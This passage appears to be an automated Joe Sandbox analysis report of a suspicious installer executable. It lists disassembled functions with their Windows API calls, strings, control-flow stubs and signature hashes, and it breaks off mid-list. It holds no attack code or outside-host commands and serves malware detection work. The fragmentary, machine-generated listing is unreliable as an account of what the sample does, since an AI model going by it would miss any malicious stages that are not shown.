                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: : Completed
                                                            • API String ID: 3677997916-2954849223
                                                            • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                            • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                            • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                            • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9
                                                            Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 714 4059fe-405a0a 715 405a0b-405a3f GetTickCount GetTempFileNameW 714->715 716 405a41-405a43 715->716 717 405a4e-405a50 715->717 716->715 718 405a45 716->718 719 405a48-405a4b 717->719 718->719
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405A1C
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-2113348990
                                                            • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                            • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                            • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                            • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64
                                                            Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 720 401e51-401e62 call 402ad0 call 404ffa call 4054c8 726 401e67-401e6c 720->726 727 401e72-401e75 726->727 728 402729-402730 726->728 730 401ec6-401ecf CloseHandle 727->730 731 401e77-401e87 WaitForSingleObject 727->731 729 40295d-40296c 728->729 730->728 730->729 733 401e97-401e99 731->733 734 401e89-401e95 call 4060e9 WaitForSingleObject 733->734 735 401e9b-401eab GetExitCodeProcess 733->735 734->733 737 401eba-401ebd 735->737 738 401ead-401eb8 call 405c8d 735->738 737->730 742 401ebf 737->742 738->730 742->730
                                                            APIs
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                              • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                              • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                              • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                              • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3585118688-0
                                                            • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                            • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                            • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                            • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99
                                                            Function 004054C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 744 4054c8-4054f5 CreateProcessW 745 405503-405504 744->745 746 4054f7-405500 CloseHandle 744->746 746->745
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                            • CloseHandle.KERNEL32(?), ref: 004054FA
                                                            Strings
                                                            • Error launching installer, xrefs: 004054DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                            • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                            • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                            • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                            Function 004031A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                              • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004031CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 4115351271-3283962145
                                                            • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                            • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                            • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                            • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                            Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                            • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                            • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                            • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                            Function 00401F08 Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                              • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                            • String ID:
                                                            • API String ID: 1691843260-0
                                                            • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                            • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                            • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                            • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                            • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                            • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                            • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                            Function 004050CD Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 004050DD
                                                              • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                            • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                            • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                            • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                            Function 004059CF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
